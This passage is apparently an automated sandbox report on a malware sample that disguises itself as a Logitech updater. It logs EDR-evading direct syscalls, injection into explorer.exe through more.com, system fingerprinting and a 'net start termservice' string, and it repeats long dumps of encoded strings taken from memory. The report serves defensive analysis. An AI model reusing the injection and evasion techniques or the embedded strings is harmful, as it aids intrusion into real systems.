Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtProtectVirtualMemory: Direct from: 0x6E5D2C38	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	NtProtectVirtualMemory: Direct from: 0x6E5B2D04	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtSetInformationThread: Direct from: 0x79ACD3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtQuerySystemInformation: Direct from: 0x517AFF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtProtectVirtualMemory: Direct from: 0x6C86214E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtSetTimerEx: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtQueryInformationToken: Direct from: 0x6C6980B4	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\more.com	Memory written: PID: 4348 base: B079C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: PID: 4348 base: 9F0008 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: PID: 3492 base: B079C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: PID: 3492 base: 3129008 value: 00	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\explorer.exe base: B079C0	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F0008	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\explorer.exe base: B079C0	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\explorer.exe base: 3129008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0078A37F cpuid

14_2_0078A37F

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	14_2_007A222E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_007A2354
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	14_2_007A245A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	14_2_0079842E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_007A2529
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	14_2_007A1BC8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	14_2_007A1DC3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	14_2_007A1E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	14_2_007A1EB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	14_2_007A1F50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	14_2_00797F0C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_007A1FDB

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\9c813d63 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bca94d0c VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\be3cb5d2 VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,

14_2_0076E8D0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0077F060 Sleep,RegOpenKeyExA,RegCloseKey,GetUserNameA,GetModuleFileNameA,

14_2_0077F060

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0079E430 _free,_free,_free,GetTimeZoneInformation,_free,

14_2_0079E430

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007691B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,

14_2_007691B0

Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Contains functionality to start a terminal service

Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: explorer.exe	String found in binary or memory: net start termservice
Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: net start termservice
Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: explorer.exe, 00000010.00000002.2933737758.00000000001D0000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: net start termservice
Source: explorer.exe, 00000010.00000002.2933737758.00000000001D0000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: cnfpnteryde.1.dr	String found in binary or memory: net start termservice
Source: cnfpnteryde.1.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 